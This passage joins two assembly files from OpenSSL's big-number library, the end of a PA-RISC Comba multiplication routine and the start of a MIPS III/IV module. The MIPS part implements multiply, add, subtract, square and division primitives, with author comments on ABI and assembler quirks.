FLDD 40(a_ptr),a5
FLDD 48(a_ptr),a6
FLDD 56(a_ptr),a7
FLDD 0(b_ptr),b0
FLDD 8(b_ptr),b1
FLDD 16(b_ptr),b2
FLDD 24(b_ptr),b3
FLDD 32(b_ptr),b4
FLDD 40(b_ptr),b5
FLDD 48(b_ptr),b6
FLDD 56(b_ptr),b7
MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
STD c1,0(r_ptr)
COPY %r0,c1
MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
STD c2,8(r_ptr)
COPY %r0,c2
MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
STD c3,16(r_ptr)
COPY %r0,c3
MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
STD c1,24(r_ptr)
COPY %r0,c1
MUL_ADD_C a4L,a4R,b0L,b0R,c2,c3,c1
MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
MUL_ADD_C a0L,a0R,b4L,b4R,c2,c3,c1
STD c2,32(r_ptr)
COPY %r0,c2
MUL_ADD_C a0L,a0R,b5L,b5R,c3,c1,c2
MUL_ADD_C a1L,a1R,b4L,b4R,c3,c1,c2
MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
MUL_ADD_C a4L,a4R,b1L,b1R,c3,c1,c2
MUL_ADD_C a5L,a5R,b0L,b0R,c3,c1,c2
STD c3,40(r_ptr)
COPY %r0,c3
MUL_ADD_C a6L,a6R,b0L,b0R,c1,c2,c3
MUL_ADD_C a5L,a5R,b1L,b1R,c1,c2,c3
MUL_ADD_C a4L,a4R,b2L,b2R,c1,c2,c3
MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
MUL_ADD_C a2L,a2R,b4L,b4R,c1,c2,c3
MUL_ADD_C a1L,a1R,b5L,b5R,c1,c2,c3
MUL_ADD_C a0L,a0R,b6L,b6R,c1,c2,c3
STD c1,48(r_ptr)
COPY %r0,c1
MUL_ADD_C a0L,a0R,b7L,b7R,c2,c3,c1
MUL_ADD_C a1L,a1R,b6L,b6R,c2,c3,c1
MUL_ADD_C a2L,a2R,b5L,b5R,c2,c3,c1
MUL_ADD_C a3L,a3R,b4L,b4R,c2,c3,c1
MUL_ADD_C a4L,a4R,b3L,b3R,c2,c3,c1
MUL_ADD_C a5L,a5R,b2L,b2R,c2,c3,c1
MUL_ADD_C a6L,a6R,b1L,b1R,c2,c3,c1
MUL_ADD_C a7L,a7R,b0L,b0R,c2,c3,c1
STD c2,56(r_ptr)
COPY %r0,c2
MUL_ADD_C a7L,a7R,b1L,b1R,c3,c1,c2
MUL_ADD_C a6L,a6R,b2L,b2R,c3,c1,c2
MUL_ADD_C a5L,a5R,b3L,b3R,c3,c1,c2
MUL_ADD_C a4L,a4R,b4L,b4R,c3,c1,c2
MUL_ADD_C a3L,a3R,b5L,b5R,c3,c1,c2
MUL_ADD_C a2L,a2R,b6L,b6R,c3,c1,c2
MUL_ADD_C a1L,a1R,b7L,b7R,c3,c1,c2
STD c3,64(r_ptr)
COPY %r0,c3
MUL_ADD_C a2L,a2R,b7L,b7R,c1,c2,c3
MUL_ADD_C a3L,a3R,b6L,b6R,c1,c2,c3
MUL_ADD_C a4L,a4R,b5L,b5R,c1,c2,c3
MUL_ADD_C a5L,a5R,b4L,b4R,c1,c2,c3
MUL_ADD_C a6L,a6R,b3L,b3R,c1,c2,c3
MUL_ADD_C a7L,a7R,b2L,b2R,c1,c2,c3
STD c1,72(r_ptr)
COPY %r0,c1
MUL_ADD_C a7L,a7R,b3L,b3R,c2,c3,c1
MUL_ADD_C a6L,a6R,b4L,b4R,c2,c3,c1
MUL_ADD_C a5L,a5R,b5L,b5R,c2,c3,c1
MUL_ADD_C a4L,a4R,b6L,b6R,c2,c3,c1
MUL_ADD_C a3L,a3R,b7L,b7R,c2,c3,c1
STD c2,80(r_ptr)
COPY %r0,c2
MUL_ADD_C a4L,a4R,b7L,b7R,c3,c1,c2
MUL_ADD_C a5L,a5R,b6L,b6R,c3,c1,c2
MUL_ADD_C a6L,a6R,b5L,b5R,c3,c1,c2
MUL_ADD_C a7L,a7R,b4L,b4R,c3,c1,c2
STD c3,88(r_ptr)
COPY %r0,c3
MUL_ADD_C a7L,a7R,b5L,b5R,c1,c2,c3
MUL_ADD_C a6L,a6R,b6L,b6R,c1,c2,c3
MUL_ADD_C a5L,a5R,b7L,b7R,c1,c2,c3
STD c1,96(r_ptr)
COPY %r0,c1
MUL_ADD_C a6L,a6R,b7L,b7R,c2,c3,c1
MUL_ADD_C a7L,a7R,b6L,b6R,c2,c3,c1
STD c2,104(r_ptr)
COPY %r0,c2
MUL_ADD_C a7L,a7R,b7L,b7R,c3,c1,c2
STD c3,112(r_ptr)
STD c1,120(r_ptr)
.EXIT
FLDD -88(%sp),%fr13
FLDD -96(%sp),%fr12
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND
;-----------------------------------------------------------------------------
;
;void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = b_ptr
;
bn_mul_comba4
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_mul_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
FSTD %fr12,32(%sp) ; save r6
FSTD %fr13,40(%sp) ; save r7
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 0(b_ptr),b0
FLDD 8(b_ptr),b1
FLDD 16(b_ptr),b2
FLDD 24(b_ptr),b3
MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
STD c1,0(r_ptr)
COPY %r0,c1
MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
STD c2,8(r_ptr)
COPY %r0,c2
MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
STD c3,16(r_ptr)
COPY %r0,c3
MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
STD c1,24(r_ptr)
COPY %r0,c1
MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
STD c2,32(r_ptr)
COPY %r0,c2
MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
STD c3,40(r_ptr)
COPY %r0,c3
MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
STD c1,48(r_ptr)
STD c2,56(r_ptr)
.EXIT
FLDD -88(%sp),%fr13
FLDD -96(%sp),%fr12
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND
;--- not PIC .SPACE $TEXT$
;--- not PIC .SUBSPA $CODE$
;--- not PIC .SPACE $PRIVATE$,SORT=16
;--- not PIC .IMPORT $global$,DATA
;--- not PIC .SPACE $TEXT$
;--- not PIC .SUBSPA $CODE$
;--- not PIC .SUBSPA $LIT$,ACCESS=0x2c
;--- not PIC C$7
;--- not PIC .ALIGN 8
;--- not PIC .STRINGZ "Division would overflow (%d)\n"
.END
|
AIFM-sys/AIFM
| 37,614
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/mips3.s
|
.rdata
.asciiz "mips3.s, Version 1.1"
.asciiz "MIPS III/IV ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
/*
* ====================================================================
* Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
* project.
*
* Rights for redistribution and usage in source and binary forms are
* granted according to the OpenSSL license. Warranty of any kind is
* disclaimed.
* ====================================================================
*/
/*
* This is my modest contributon to the OpenSSL project (see
* http://www.openssl.org/ for more information about it) and is
* a drop-in MIPS III/IV ISA replacement for crypto/bn/bn_asm.c
* module. For updates see http://fy.chalmers.se/~appro/hpe/.
*
* The module is designed to work with either of the "new" MIPS ABI(5),
* namely N32 or N64, offered by IRIX 6.x. It's not ment to work under
* IRIX 5.x not only because it doesn't support new ABIs but also
* because 5.x kernels put R4x00 CPU into 32-bit mode and all those
* 64-bit instructions (daddu, dmultu, etc.) found below gonna only
* cause illegal instruction exception:-(
*
* In addition the code depends on preprocessor flags set up by MIPSpro
* compiler driver (either as or cc) and therefore (probably?) can't be
* compiled by the GNU assembler. GNU C driver manages fine though...
* I mean as long as -mmips-as is specified or is the default option,
* because then it simply invokes /usr/bin/as which in turn takes
* perfect care of the preprocessor definitions. Another neat feature
* offered by the MIPSpro assembler is an optimization pass. This gave
* me the opportunity to have the code looking more regular as all those
* architecture dependent instruction rescheduling details were left to
* the assembler. Cool, huh?
*
* Performance improvement is astonishing! 'apps/openssl speed rsa dsa'
* goes way over 3 times faster!
*
* <appro@fy.chalmers.se>
*/
#include <asm.h>
#include <regdef.h>
#if _MIPS_ISA>=4
#define MOVNZ(cond,dst,src) \
movn dst,src,cond
#else
#define MOVNZ(cond,dst,src) \
.set noreorder; \
bnezl cond,.+8; \
move dst,src; \
.set reorder
#endif
.text
.set noat
.set reorder
#define MINUS4 v1
.align 5
LEAF(bn_mul_add_words)
.set noreorder
bgtzl a2,.L_bn_mul_add_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_mul_add_words_proceed:
li MINUS4,-4
and ta0,a2,MINUS4
move v0,zero
beqz ta0,.L_bn_mul_add_words_tail
.L_bn_mul_add_words_loop:
dmultu t0,a3
ld t1,0(a0)
ld t2,8(a1)
ld t3,8(a0)
ld ta0,16(a1)
ld ta1,16(a0)
daddu t1,v0
sltu v0,t1,v0 /* All manuals say it "compares 32-bit
* values", but it seems to work fine
* even on 64-bit registers. */
mflo AT
mfhi t0
daddu t1,AT
daddu v0,t0
sltu AT,t1,AT
sd t1,0(a0)
daddu v0,AT
dmultu t2,a3
ld ta2,24(a1)
ld ta3,24(a0)
daddu t3,v0
sltu v0,t3,v0
mflo AT
mfhi t2
daddu t3,AT
daddu v0,t2
sltu AT,t3,AT
sd t3,8(a0)
daddu v0,AT
dmultu ta0,a3
subu a2,4
PTR_ADD a0,32
PTR_ADD a1,32
daddu ta1,v0
sltu v0,ta1,v0
mflo AT
mfhi ta0
daddu ta1,AT
daddu v0,ta0
sltu AT,ta1,AT
sd ta1,-16(a0)
daddu v0,AT
dmultu ta2,a3
and ta0,a2,MINUS4
daddu ta3,v0
sltu v0,ta3,v0
mflo AT
mfhi ta2
daddu ta3,AT
daddu v0,ta2
sltu AT,ta3,AT
sd ta3,-8(a0)
daddu v0,AT
.set noreorder
bgtzl ta0,.L_bn_mul_add_words_loop
ld t0,0(a1)
bnezl a2,.L_bn_mul_add_words_tail
ld t0,0(a1)
.set reorder
.L_bn_mul_add_words_return:
jr ra
.L_bn_mul_add_words_tail:
dmultu t0,a3
ld t1,0(a0)
subu a2,1
daddu t1,v0
sltu v0,t1,v0
mflo AT
mfhi t0
daddu t1,AT
daddu v0,t0
sltu AT,t1,AT
sd t1,0(a0)
daddu v0,AT
beqz a2,.L_bn_mul_add_words_return
ld t0,8(a1)
dmultu t0,a3
ld t1,8(a0)
subu a2,1
daddu t1,v0
sltu v0,t1,v0
mflo AT
mfhi t0
daddu t1,AT
daddu v0,t0
sltu AT,t1,AT
sd t1,8(a0)
daddu v0,AT
beqz a2,.L_bn_mul_add_words_return
ld t0,16(a1)
dmultu t0,a3
ld t1,16(a0)
daddu t1,v0
sltu v0,t1,v0
mflo AT
mfhi t0
daddu t1,AT
daddu v0,t0
sltu AT,t1,AT
sd t1,16(a0)
daddu v0,AT
jr ra
END(bn_mul_add_words)
.align 5
LEAF(bn_mul_words)
.set noreorder
bgtzl a2,.L_bn_mul_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_mul_words_proceed:
li MINUS4,-4
and ta0,a2,MINUS4
move v0,zero
beqz ta0,.L_bn_mul_words_tail
.L_bn_mul_words_loop:
dmultu t0,a3
ld t2,8(a1)
ld ta0,16(a1)
ld ta2,24(a1)
mflo AT
mfhi t0
daddu v0,AT
sltu t1,v0,AT
sd v0,0(a0)
daddu v0,t1,t0
dmultu t2,a3
subu a2,4
PTR_ADD a0,32
PTR_ADD a1,32
mflo AT
mfhi t2
daddu v0,AT
sltu t3,v0,AT
sd v0,-24(a0)
daddu v0,t3,t2
dmultu ta0,a3
mflo AT
mfhi ta0
daddu v0,AT
sltu ta1,v0,AT
sd v0,-16(a0)
daddu v0,ta1,ta0
dmultu ta2,a3
and ta0,a2,MINUS4
mflo AT
mfhi ta2
daddu v0,AT
sltu ta3,v0,AT
sd v0,-8(a0)
daddu v0,ta3,ta2
.set noreorder
bgtzl ta0,.L_bn_mul_words_loop
ld t0,0(a1)
bnezl a2,.L_bn_mul_words_tail
ld t0,0(a1)
.set reorder
.L_bn_mul_words_return:
jr ra
.L_bn_mul_words_tail:
dmultu t0,a3
subu a2,1
mflo AT
mfhi t0
daddu v0,AT
sltu t1,v0,AT
sd v0,0(a0)
daddu v0,t1,t0
beqz a2,.L_bn_mul_words_return
ld t0,8(a1)
dmultu t0,a3
subu a2,1
mflo AT
mfhi t0
daddu v0,AT
sltu t1,v0,AT
sd v0,8(a0)
daddu v0,t1,t0
beqz a2,.L_bn_mul_words_return
ld t0,16(a1)
dmultu t0,a3
mflo AT
mfhi t0
daddu v0,AT
sltu t1,v0,AT
sd v0,16(a0)
daddu v0,t1,t0
jr ra
END(bn_mul_words)
.align 5
LEAF(bn_sqr_words)
.set noreorder
bgtzl a2,.L_bn_sqr_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_sqr_words_proceed:
li MINUS4,-4
and ta0,a2,MINUS4
move v0,zero
beqz ta0,.L_bn_sqr_words_tail
.L_bn_sqr_words_loop:
dmultu t0,t0
ld t2,8(a1)
ld ta0,16(a1)
ld ta2,24(a1)
mflo t1
mfhi t0
sd t1,0(a0)
sd t0,8(a0)
dmultu t2,t2
subu a2,4
PTR_ADD a0,64
PTR_ADD a1,32
mflo t3
mfhi t2
sd t3,-48(a0)
sd t2,-40(a0)
dmultu ta0,ta0
mflo ta1
mfhi ta0
sd ta1,-32(a0)
sd ta0,-24(a0)
dmultu ta2,ta2
and ta0,a2,MINUS4
mflo ta3
mfhi ta2
sd ta3,-16(a0)
sd ta2,-8(a0)
.set noreorder
bgtzl ta0,.L_bn_sqr_words_loop
ld t0,0(a1)
bnezl a2,.L_bn_sqr_words_tail
ld t0,0(a1)
.set reorder
.L_bn_sqr_words_return:
move v0,zero
jr ra
.L_bn_sqr_words_tail:
dmultu t0,t0
subu a2,1
mflo t1
mfhi t0
sd t1,0(a0)
sd t0,8(a0)
beqz a2,.L_bn_sqr_words_return
ld t0,8(a1)
dmultu t0,t0
subu a2,1
mflo t1
mfhi t0
sd t1,16(a0)
sd t0,24(a0)
beqz a2,.L_bn_sqr_words_return
ld t0,16(a1)
dmultu t0,t0
mflo t1
mfhi t0
sd t1,32(a0)
sd t0,40(a0)
jr ra
END(bn_sqr_words)
.align 5
LEAF(bn_add_words)
.set noreorder
bgtzl a3,.L_bn_add_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_add_words_proceed:
li MINUS4,-4
and AT,a3,MINUS4
move v0,zero
beqz AT,.L_bn_add_words_tail
.L_bn_add_words_loop:
ld ta0,0(a2)
subu a3,4
ld t1,8(a1)
and AT,a3,MINUS4
ld t2,16(a1)
PTR_ADD a2,32
ld t3,24(a1)
PTR_ADD a0,32
ld ta1,-24(a2)
PTR_ADD a1,32
ld ta2,-16(a2)
ld ta3,-8(a2)
daddu ta0,t0
sltu t8,ta0,t0
daddu t0,ta0,v0
sltu v0,t0,ta0
sd t0,-32(a0)
daddu v0,t8
daddu ta1,t1
sltu t9,ta1,t1
daddu t1,ta1,v0
sltu v0,t1,ta1
sd t1,-24(a0)
daddu v0,t9
daddu ta2,t2
sltu t8,ta2,t2
daddu t2,ta2,v0
sltu v0,t2,ta2
sd t2,-16(a0)
daddu v0,t8
daddu ta3,t3
sltu t9,ta3,t3
daddu t3,ta3,v0
sltu v0,t3,ta3
sd t3,-8(a0)
daddu v0,t9
.set noreorder
bgtzl AT,.L_bn_add_words_loop
ld t0,0(a1)
bnezl a3,.L_bn_add_words_tail
ld t0,0(a1)
.set reorder
.L_bn_add_words_return:
jr ra
.L_bn_add_words_tail:
ld ta0,0(a2)
daddu ta0,t0
subu a3,1
sltu t8,ta0,t0
daddu t0,ta0,v0
sltu v0,t0,ta0
sd t0,0(a0)
daddu v0,t8
beqz a3,.L_bn_add_words_return
ld t1,8(a1)
ld ta1,8(a2)
daddu ta1,t1
subu a3,1
sltu t9,ta1,t1
daddu t1,ta1,v0
sltu v0,t1,ta1
sd t1,8(a0)
daddu v0,t9
beqz a3,.L_bn_add_words_return
ld t2,16(a1)
ld ta2,16(a2)
daddu ta2,t2
sltu t8,ta2,t2
daddu t2,ta2,v0
sltu v0,t2,ta2
sd t2,16(a0)
daddu v0,t8
jr ra
END(bn_add_words)
.align 5
LEAF(bn_sub_words)
.set noreorder
bgtzl a3,.L_bn_sub_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_sub_words_proceed:
li MINUS4,-4
and AT,a3,MINUS4
move v0,zero
beqz AT,.L_bn_sub_words_tail
.L_bn_sub_words_loop:
ld ta0,0(a2)
subu a3,4
ld t1,8(a1)
and AT,a3,MINUS4
ld t2,16(a1)
PTR_ADD a2,32
ld t3,24(a1)
PTR_ADD a0,32
ld ta1,-24(a2)
PTR_ADD a1,32
ld ta2,-16(a2)
ld ta3,-8(a2)
sltu t8,t0,ta0
dsubu t0,ta0
dsubu ta0,t0,v0
sd ta0,-32(a0)
MOVNZ (t0,v0,t8)
sltu t9,t1,ta1
dsubu t1,ta1
dsubu ta1,t1,v0
sd ta1,-24(a0)
MOVNZ (t1,v0,t9)
sltu t8,t2,ta2
dsubu t2,ta2
dsubu ta2,t2,v0
sd ta2,-16(a0)
MOVNZ (t2,v0,t8)
sltu t9,t3,ta3
dsubu t3,ta3
dsubu ta3,t3,v0
sd ta3,-8(a0)
MOVNZ (t3,v0,t9)
.set noreorder
bgtzl AT,.L_bn_sub_words_loop
ld t0,0(a1)
bnezl a3,.L_bn_sub_words_tail
ld t0,0(a1)
.set reorder
.L_bn_sub_words_return:
jr ra
.L_bn_sub_words_tail:
ld ta0,0(a2)
subu a3,1
sltu t8,t0,ta0
dsubu t0,ta0
dsubu ta0,t0,v0
MOVNZ (t0,v0,t8)
sd ta0,0(a0)
beqz a3,.L_bn_sub_words_return
ld t1,8(a1)
subu a3,1
ld ta1,8(a2)
sltu t9,t1,ta1
dsubu t1,ta1
dsubu ta1,t1,v0
MOVNZ (t1,v0,t9)
sd ta1,8(a0)
beqz a3,.L_bn_sub_words_return
ld t2,16(a1)
ld ta2,16(a2)
sltu t8,t2,ta2
dsubu t2,ta2
dsubu ta2,t2,v0
MOVNZ (t2,v0,t8)
sd ta2,16(a0)
jr ra
END(bn_sub_words)
#undef MINUS4
.align 5
LEAF(bn_div_3_words)
.set reorder
move a3,a0 /* we know that bn_div_words doesn't
* touch a3, ta2, ta3 and preserves a2
* so that we can save two arguments
* and return address in registers
* instead of stack:-)
*/
ld a0,(a3)
move ta2,a1
ld a1,-8(a3)
bne a0,a2,.L_bn_div_3_words_proceed
li v0,-1
jr ra
.L_bn_div_3_words_proceed:
move ta3,ra
bal bn_div_words
move ra,ta3
dmultu ta2,v0
ld t2,-16(a3)
move ta0,zero
mfhi t1
mflo t0
sltu t8,t1,v1
.L_bn_div_3_words_inner_loop:
bnez t8,.L_bn_div_3_words_inner_loop_done
sgeu AT,t2,t0
seq t9,t1,v1
and AT,t9
sltu t3,t0,ta2
daddu v1,a2
dsubu t1,t3
dsubu t0,ta2
sltu t8,t1,v1
sltu ta0,v1,a2
or t8,ta0
.set noreorder
beqzl AT,.L_bn_div_3_words_inner_loop
dsubu v0,1
.set reorder
.L_bn_div_3_words_inner_loop_done:
jr ra
END(bn_div_3_words)
.align 5
LEAF(bn_div_words)
.set noreorder
bnezl a2,.L_bn_div_words_proceed
move v1,zero
jr ra
li v0,-1 /* I'd rather signal div-by-zero
* which can be done with 'break 7' */
.L_bn_div_words_proceed:
bltz a2,.L_bn_div_words_body
move t9,v1
dsll a2,1
bgtz a2,.-4
addu t9,1
.set reorder
negu t1,t9
li t2,-1
dsll t2,t1
and t2,a0
dsrl AT,a1,t1
.set noreorder
bnezl t2,.+8
break 6 /* signal overflow */
.set reorder
dsll a0,t9
dsll a1,t9
or a0,AT
#define QT ta0
#define HH ta1
#define DH v1
.L_bn_div_words_body:
dsrl DH,a2,32
sgeu AT,a0,a2
.set noreorder
bnezl AT,.+8
dsubu a0,a2
.set reorder
li QT,-1
dsrl HH,a0,32
dsrl QT,32 /* q=0xffffffff */
beq DH,HH,.L_bn_div_words_skip_div1
ddivu zero,a0,DH
mflo QT
.L_bn_div_words_skip_div1:
dmultu a2,QT
dsll t3,a0,32
dsrl AT,a1,32
or t3,AT
mflo t0
mfhi t1
.L_bn_div_words_inner_loop1:
sltu t2,t3,t0
seq t8,HH,t1
sltu AT,HH,t1
and t2,t8
sltu v0,t0,a2
or AT,t2
.set noreorder
beqz AT,.L_bn_div_words_inner_loop1_done
dsubu t1,v0
dsubu t0,a2
b .L_bn_div_words_inner_loop1
dsubu QT,1
.set reorder
.L_bn_div_words_inner_loop1_done:
dsll a1,32
dsubu a0,t3,t0
dsll v0,QT,32
li QT,-1
dsrl HH,a0,32
dsrl QT,32 /* q=0xffffffff */
beq DH,HH,.L_bn_div_words_skip_div2
ddivu zero,a0,DH
mflo QT
.L_bn_div_words_skip_div2:
#undef DH
dmultu a2,QT
dsll t3,a0,32
dsrl AT,a1,32
or t3,AT
mflo t0
mfhi t1
.L_bn_div_words_inner_loop2:
sltu t2,t3,t0
seq t8,HH,t1
sltu AT,HH,t1
and t2,t8
sltu v1,t0,a2
or AT,t2
.set noreorder
beqz AT,.L_bn_div_words_inner_loop2_done
dsubu t1,v1
dsubu t0,a2
b .L_bn_div_words_inner_loop2
dsubu QT,1
.set reorder
.L_bn_div_words_inner_loop2_done:
#undef HH
dsubu a0,t3,t0
or v0,QT
dsrl v1,a0,t9 /* v1 contains remainder if anybody wants it */
dsrl a2,t9 /* restore a2 */
jr ra
#undef QT
END(bn_div_words)
#define a_0 t0
#define a_1 t1
#define a_2 t2
#define a_3 t3
#define b_0 ta0
#define b_1 ta1
#define b_2 ta2
#define b_3 ta3
#define a_4 s0
#define a_5 s2
#define a_6 s4
#define a_7 a1 /* once we load a[7] we don't need a anymore */
#define b_4 s1
#define b_5 s3
#define b_6 s5
#define b_7 a2 /* once we load b[7] we don't need b anymore */
#define t_1 t8
#define t_2 t9
#define c_1 v0
#define c_2 v1
#define c_3 a3
#define FRAME_SIZE 48
.align 5
LEAF(bn_mul_comba8)
.set noreorder
PTR_SUB sp,FRAME_SIZE
.frame sp,64,ra
.set reorder
ld a_0,0(a1) /* If compiled with -mips3 option on
* R5000 box assembler barks on this
* line with "shouldn't have mult/div
* as last instruction in bb (R10K
* bug)" warning. If anybody out there
* has a clue about how to circumvent
* this do send me a note.
* <appro@fy.chalmers.se>
*/
ld b_0,0(a2)
ld a_1,8(a1)
ld a_2,16(a1)
ld a_3,24(a1)
ld b_1,8(a2)
ld b_2,16(a2)
ld b_3,24(a2)
dmultu a_0,b_0 /* mul_add_c(a[0],b[0],c1,c2,c3); */
sd s0,0(sp)
sd s1,8(sp)
sd s2,16(sp)
sd s3,24(sp)
sd s4,32(sp)
sd s5,40(sp)
mflo c_1
mfhi c_2
dmultu a_0,b_1 /* mul_add_c(a[0],b[1],c2,c3,c1); */
ld a_4,32(a1)
ld a_5,40(a1)
ld a_6,48(a1)
ld a_7,56(a1)
ld b_4,32(a2)
ld b_5,40(a2)
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu c_3,t_2,AT
dmultu a_1,b_0 /* mul_add_c(a[1],b[0],c2,c3,c1); */
ld b_6,48(a2)
ld b_7,56(a2)
sd c_1,0(a0) /* r[0]=c1; */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
sd c_2,8(a0) /* r[1]=c2; */
dmultu a_2,b_0 /* mul_add_c(a[2],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
dmultu a_1,b_1 /* mul_add_c(a[1],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_0,b_2 /* mul_add_c(a[0],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,16(a0) /* r[2]=c3; */
dmultu a_0,b_3 /* mul_add_c(a[0],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_1,b_2 /* mul_add_c(a[1],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_2,b_1 /* mul_add_c(a[2],b[1],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,b_0 /* mul_add_c(a[3],b[0],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,24(a0) /* r[3]=c1; */
dmultu a_4,b_0 /* mul_add_c(a[4],b[0],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_3,b_1 /* mul_add_c(a[3],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,b_2 /* mul_add_c(a[2],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_1,b_3 /* mul_add_c(a[1],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_0,b_4 /* mul_add_c(a[0],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,32(a0) /* r[4]=c2; */
dmultu a_0,b_5 /* mul_add_c(a[0],b[5],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_1,b_4 /* mul_add_c(a[1],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_2,b_3 /* mul_add_c(a[2],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
